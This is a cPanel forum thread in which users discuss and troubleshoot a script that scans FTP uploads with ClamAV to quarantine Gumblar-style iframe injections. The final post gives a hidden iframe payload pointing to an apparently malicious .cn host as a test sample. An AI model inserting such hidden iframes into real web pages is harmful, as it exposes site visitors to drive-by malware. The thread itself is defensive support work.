The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

Discussion in 'Security' started by hidonet, Aug 7, 2009.

  1. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    I can add if you want.

    Please send me the content of file. Please make zip and send to hidonet [at] oxio.net
     
  2. Voltio

    Voltio Active Member

    Joined:
    Oct 17, 2004
    Messages:
    32
    Likes Received:
    0
    Trophy Points:
    156
    This script seems very insteresting and useful, for some reason it does not work in my server :(... I will keep trying to get it to work..
     
  3. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    if your server is linux/cpanel/pure-ftpd script can work. if you are getting errors please tell me. i can help you for fix these problems..
     
  4. wthrees

    wthrees Registered

    Joined:
    May 4, 2005
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    151
    Hi great work !!
    I honestly appreciate what you have made for the community.

    I would like to request 2 things to enhance the features:

    1. I have two servers and get the alerts on the same email address for both the servers. Can you add the server hostname in the email subject? like:

    Gumblar Attack !!! user : trafficn on [HostNameHere]

    2. when the files are quarnteened, its a very logical and good idea to move the files to directories with the username.
    I;d request you add the username dir so the file is moved to the relevent user folder. like:

    /quarantine/clamav/UserNameHere/infectedfile.ext


    Thanks and hope these can be implemented in the next update.
     
  5. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    Ok I will do these requests in next release ( soon )...
     
  6. wthrees

    wthrees Registered

    Joined:
    May 4, 2005
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    151
    when sould i be back to check the update?
     
  7. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    i think in 1-2 days...
     
  8. luisp

    luisp Well-Known Member
    PartnerNOC

    Joined:
    Jan 17, 2003
    Messages:
    57
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Portugal
    cPanel Access Level:
    DataCenter Provider
    Hello,

    First, congrats for your great script. I think we all could donate something to to support this great work.

    Any idea on the hostname option in subject? I have a few servers, and this option would be very important.

    thanks
     
  9. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    Ok I will add..
     
  10. mambovince

    mambovince Well-Known Member

    Joined:
    Jan 15, 2005
    Messages:
    192
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    London, UK
    Hi,
    Firstly I also want to thank you for your time on this.

    I haven't tried it yet, but can you let us know how it compares to the CSX offering from Configserver.com please?

    Would it also be pointless to have both?

    Best regards,

    - Vince
     
  11. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    Hi,

    This script just scanning uploaded files with pure-ftp. Not suitable for scanning PHP, Perl or other script based uploads...
     
  12. 9xlinux

    9xlinux Well-Known Member

    Joined:
    Dec 20, 2009
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    66
    cPanel Access Level:
    Root Administrator
    I have installed by following Installation » Anti-Gumblar
    I have tried to upload IFrame infacted file.
    But I think this scripts is not working for me.
    I have restarted pure-ftp many times via /etc/init.d/pure-ftpd restart
    But Still not working
     
  13. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    Please send me your sample file..
     
  14. 9xlinux

    9xlinux Well-Known Member

    Joined:
    Dec 20, 2009
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    66
    cPanel Access Level:
    Root Administrator
    I have follow the error log file in same folder and found some comments in ftp_clamscan_config.php file was not in one line, so second line was not commented.
    Due to this The script was showing error.
    I comment out second line now the script is working fine.
    Thanks for a great script.
     
  15. 9xlinux

    9xlinux Well-Known Member

    Joined:
    Dec 20, 2009
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    66
    cPanel Access Level:
    Root Administrator
    Very Nice script but using too much CPU at the time of scanning.
    My server load increases 2 times one someone upload file via ftp.
     
  16. nitaish

    nitaish Well-Known Member
    PartnerNOC

    Joined:
    Jan 6, 2006
    Messages:
    129
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    Mulund, India, India
    Instead of quarantine, the script should simply remove the iframe code which has been injected and block the IP from which the injection was done. This would make more sense.
     
  17. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    removing code is a dangerous thing.
     
  18. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    166
    Sorry to open an old thread, but I've sucessfully installed this on 5 servers, but I have to servers that it just doesn't want to work on.

    On those servers, the install appears to go ok, and the restart of pure-ftpd through ssh seems to work fine. I see this from my ps output:

    root 7935 0.0 0.0 7616 260 ? Ss 15:21 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
    root 8268 0.0 6.4 156940 133632 ? Ssl 16:54 0:00 /usr/local/sbin/clamd


    But when I upload a file nothing happens. No quarantine, no log in the log file, no e-mail?

    is there a checklist of things I should try maybe?
     
  19. Voltio

    Voltio Active Member

    Joined:
    Oct 17, 2004
    Messages:
    32
    Likes Received:
    0
    Trophy Points:
    156
    How to test it?

    How can I test it? I've installed it but how can I make sure it works.? I uploaded a .php file with the following lines:

    iframe
    http://
    :8080
     
  20. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    166
    Create a file with this in it:

    Code:
    <iframe src="http://gianthighest.cn:8080/index.php" width=171 height=190 style="visibility: hidden"></iframe>
     
Loading...

Share This Page